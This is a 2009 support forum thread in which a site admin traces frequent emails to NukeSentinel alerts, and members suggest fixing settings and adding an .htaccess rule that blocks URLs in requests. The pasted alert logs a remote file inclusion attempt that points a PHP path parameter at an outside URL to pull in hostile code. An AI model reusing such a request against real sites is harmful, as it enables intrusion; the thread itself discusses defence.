Login or Register  • Home • Downloads • Your Account • Forums •

Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in What is causing these emails? View next topic View previous topic   Web RavenPHPScripts (This Site)      Ravens PHP Scripts And Web Hosting Forum Index » NukeSentinel(tm) v2.6.x Author Message hamrdeye Hangin' Around Joined: Aug 20, 2008 Posts: 28 Posted: Tue Sep 29, 2009 2:59 pm I keep getting tons of these emails emailed to my admin account on our website. I recently updated to Raven Nuke from 8.1 phpnuke. I am getting like 10 a day, and I am not sure what is wrong as I am having difficulty understanding the message. I can't paste the message here I am getting "The resource/content requested is not in an acceptable format." How can I supply the email? kguske Site Admin Joined: Jun 04, 2004 Posts: 5996 Posted: Tue Sep 29, 2009 3:10 pm Just paste the main text message from the email. It doesn't need to contain any formatting. That said, without knowing what types of messages you're getting (i.e. which blockers are being triggered), are you using request method or string blockers? Also, harvester and referer blocks can be triggered frequently if these happen on your sites. For some blocks, you may wish NOT to receive an email. For example, harvesters and referers are blocked before they can do anything on your site, so you probably don't need an email every time they visit. To turn off emails, just change the Activate setting for these blockers to something that does not include email. hamrdeye Hangin' Around Joined: Aug 20, 2008 Posts: 28 Posted: Tue Sep 29, 2009 8:24 pm The message is from: Mail Delivery System With a subject of : Mail delivery failed: returning message to sender So its like my site is trying to send something, but yet the email is from Nuke Sentinel. I will attempt to paste again... Code: This message was created automatically by mail delivery software. A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed:   Only registered users can see links on this board! Get registered or login to the forums!     Unrouteable address ------ This is a copy of the message, including all the headers. ------ Return-path: <dofadmin@teamdof.com> Received: from teamdof by server307.serverquality.com with local (Exim 4.69) (envelope-from <dofadmin@teamdof.com>) id 1MsXzO-0002JD-Et for Only registered users can see links on this board! Get registered or login to the forums! ; Tue, 29 Sep 2009 03:23:14 -0500 To: e <w@server307.serverquality.com> Subject: Blocked abuse from 195.186.64.229 From: Only registered users can see links on this board! Get registered or login to the forums! Reply-To: Only registered users can see links on this board! Get registered or login to the forums! Date: Tue, 29 Sep 2009 03:23:14 -0500 X-LibVersion: 3.3.2_4 MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1; format=flowed Content-Transfer-Encoding: 8bit Message-ID: <20090929082314.8877.622664592.swift@www.teamdof.com> X-ServerQuality-MailScanner-Information: Please contact the ISP for more information X-ServerQuality-MailScanner-ID: 1MsXzO-0002JD-Et X-ServerQuality-MailScanner: Found to be clean X-ServerQuality-MailScanner-SpamCheck: not spam, SpamAssassin (not cached, score=-2.6, required 7, autolearn=not spam, BAYES_00 -2.60, NO_RELAYS -0.00) X-ServerQuality-MailScanner-From: Only registered users can see links on this board! Get registered or login to the forums! X-Spam-Status: No Created By: NukeSentinel(tm) 2.6.02 Date &amp; Time: 2009-09-29 03:23:14 CDT GMT -0500 Blocked IP: 195.186.64.229 User ID: Anonymous (1) Reason: Abuse-Filter -------------------- Referer: none User Agent: Mozilla/5.0 HTTP Host: Only registered users can see links on this board! Get registered or login to the forums! Script Name: /modules.php Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt??? Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt??? Post String: Not Available Forwarded For: none Client IP: none Remote Address: 195.186.64.229 Remote Port: 9463 Request Method: GET Ok I had to add spaces to the Query String and Get String lines for the forum to allow the post.. I have got 15 of these so far today.. I do get emails to my admin account regarding blocked ip's but not this frequently.. I have no idea where the "w@server307.serverquality.com" is from...???? jakec Site Admin Joined: Feb 06, 2006 Posts: 3028 Location: United Kingdom Posted: Wed Sep 30, 2009 12:21 am Well it looks like someone has been attempting to hack you site, but NS has blocked them. Check the email address set in you NS admin panel. kd8hho Worker Joined: Mar 30, 2009 Posts: 105 Posted: Wed Sep 30, 2009 4:38 pm Code: Referer: none User Agent: Mozilla/5.0 HTTP Host: Only registered users can see links on this board! Get registered or login to the forums! Script Name: /modules.php Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt??? Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt??? Post String: Not Available Forwarded For: none Client IP: none Remote Address: 195.186.64.229 Remote Port: 9463 Request Method: GET i get that alot. iirc its trying to upload a shell script into your site. i think i block 5 to 10 a day myself. make sure your e-mail is set rigt in NS admin as jakec said hamrdeye Hangin' Around Joined: Aug 20, 2008 Posts: 28 Posted: Wed Sep 30, 2009 10:45 pm Well the email was set wrong in NS.. I changed it. I think that stopped it.. Will report if it didn't.. Thanks for the help... BTW - Should NS be blocking the offending ip's? Cause I have nothing in my blocked ip list. I have changed the permissions to 666 and the path appears to be right in NS prefs. Is there something else I need to do? slackervaara Worker Joined: Aug 26, 2007 Posts: 234 Posted: Wed Sep 30, 2009 11:42 pm If you add these lines in your .htaccess these types of hacks will be blocked prior to Sentinel and you will then not get any more of these emails: RewriteEngine On RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR] RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.* RewriteRule ^.* - [F] jakec Site Admin Joined: Feb 06, 2006 Posts: 3028 Location: United Kingdom Posted: Thu Oct 01, 2009 12:21 am Blocked IP's are saved in two places, the database and the .htaccess file. If this is not happening make sure the blocker settings are set correctly in NS. hamrdeye Hangin' Around Joined: Aug 20, 2008 Posts: 28 Posted: Thu Oct 01, 2009 10:17 am It was the blocker settings. I will add the code to my .htacess file also.. Thanks! Display posts from previous:   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year  Oldest FirstNewest First        Ravens PHP Scripts And Web Hosting Forum Index » NukeSentinel(tm) v2.6.x  Jump to:  Select a forum Read Me First!!!----------------Board Rules and Regulations Web Hosting Services----------------RWH GeneralRWH Pre Sale QuestionsRWH Client Center Application OnlyRWH OtherFAQ - PHP5 w/phpSuExec Conversion From PHP4PHP5 Conversion Issues From PHP4 RavenNuke(tm) Programming Standards/Approaches/Philosophy----------------RavenNuke / Raven CMS CMS WikiSecurity IssuesConverting/Creating BlocksConverting/Creating ModulesConverting/Creating ThemesConverting/Creating OtherConverting/Creating General DiscussionCertification - Submit Scripts For RavenNuke(tm) CertificationCertification - Modules, Blocks, Other Scripts/Applications Converted For RavenNuke(tm)Certification - All Discussion RavenNuke(tm) v2.5x----------------RavenNuke(tm) v2.5x RavenNuke(tm) v2.4x----------------v2.4 RN Announcementsv2.4 RN Documentationv2.4 RN Issues RavenNuke(tm) v2.3x----------------v2.3 RN Announcementsv2.3 RN Quick Fixesv2.3 RN Issuesv2.3 RN Documentationv2.3 RN Feedback/Suggestionsv2.30.01 RN Security Issuesv2.30.01 RN New Installation Issuesv2.30.01 RN Upgrade Issuesv2.30.01 RN All Other Issues RavenNuke(tm) v2.2x----------------RN v2.20.00 - AnnouncementsRN v2.20.00 - All IssuesRN v2.20.00 - Feedback RavenNuke(tm) Addons----------------FCKeditor/WYSIWYG IssuesnukeFeed/FeedCreatorForum Attachment ModnukeSEOShortLinks/TegoNukeNukePie/SimplePieeCommerce Site Specific Stuff----------------READ ME FIRSTAnnouncementsRaven's v7.0 Customized DistroHack Attempt ScriptRaven's Customized Distribution PacksBUGS/FIXES - Raven's v7.3 Customized DistroCache Lite Admin ModuleNuke Tool Box (TM)Captcha SecurityRaven's RavenNuke(tm) v1.x DistroRaven's RavenNuke(tm) v2.00.00 - v2.02.00 DistroWYSIWYG - Raven's RavenNuke(tm) v2.x DistroRaven's Collapsing Forums BlockGT - Raven's RavenNuke(tm) v2.x DistroRaven's RavenNuke(tm) v2.02.02 DistroPost Fixes - Raven's RavenNuke(tm) v2.02.02 DistroPublic Testing of RavenNuke(tm) v2.10.00HtAccesserIssues/Problems With This Site Security----------------NukeSentinel(tm) Country and IP2Country UpdatesSecurity - PHP NukeSecurity - OtherNukeSentinel(tm) v2.6.xNukeSentinel(tm) v2.5.xNukeSentinel(tm) v2.4.xNukeSentinel(tm)NukeSentinel(tm) Bug ReportsNukeSentinel(tm) Enhancement RequestsNukeSentinel(tm) AnnouncementsPHP-Nuke Patched Series By Chatserv Information About Forums----------------PHPBBBB2NukePunBB PHP-Portal Project (Not General phpnuke!)----------------AnnouncementsDesign Discussions Scripts - General----------------Bug FixesGeneral/Other StuffHow To'sInstallation HelpPost Installation HelpGT - Next Gen and StandardSeeking applications ...ThemesBlocksModulesMaking Nuke Efficientphpnuke 8.1phpnuke 8.0phpnuke 7.9phpnuke 7.8phpnuke 7.7phpnuke 7.6phpnuke 7.6 Bugs/Fixesphpnuke 7.5phpnuke 7.4phpnuke 7.3phpnuke 7.2phpnuke 7.1phpnuke 7.0phpnuke 6.9phpnuke 6.8Bug Fixes for phpnuke 6.5phpnuke 6.5Gallery/Gallery2CNB Your AccountBrowser Specific IssuesUpgrading NukeNuke Treasury NSN Scripts----------------NSN NewsNSN GroupsNSN OtherNSN Gr Downloads - a.k.a NukeDepositoryNSN NukeProject Other CMS/Portal Applications----------------Post NukeNuke PlatinumNuke Evolution PHPBB----------------Stand Alonew/Nuke 6.5w/Nuke 6.9BBtoNuke ModsBBtoNuke General Programming - Server Help----------------PHPMySQLFor HireApacheHTMLCSSJavaScriptServer Help Guestbook Application (KISGB)----------------KISGB General Support Stock Quote Application (KISSQ)----------------KISSQ General Support RavenNuke(tm) v2.10.01----------------RN v2.10.01 - All IssuesRN v2.10.01 - Feedback RavenNuke(tm) v2.10.00----------------RN AnnouncementsRN FAQRN Bug FixesRN Not BugsRN Documentation Issues/SuggestionsRN Enhancement Requests and SuggestionsRN NSN Groups IssuesRN Themes IssuesRN NukeSentinel(tm) issuesRN Installer/Setup IssuesRN Bug Reports - Other IssuesRN Conversion Issues From v2.02RN Conversion Issues From Standard phpNukeRN The Good, The Bad, The Ugly 6.5 Hacks----------------Old Articles Hack Nuke News Module Hack To Allow Ordering of Articles----------------News Module Hack - AnnouncementsNews Module Hack - BugsNews Module Hack - Enhancement RequestsNews Module Hack - Discussion Other Stuff----------------Other - DiscussionOther - Sites To VisitOther - Chit ChatOther - PoliticsOther - Movie ReviewsOther - Humor Religion----------------Religion - GeneralPrayer/Praise Requests Potpourri----------------Rants & Raves Private----------------Reading - AnnouncementsReading - Digital BooksReading - Hard/Soft cover BooksReading - Digital MagazinesReading - Printed Magazines  View next topic View previous topic You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum Forums ©

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file



Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com :::: fisubice Theme Modified by the RavenNuke™ Team ::
:: :: ::

zerosum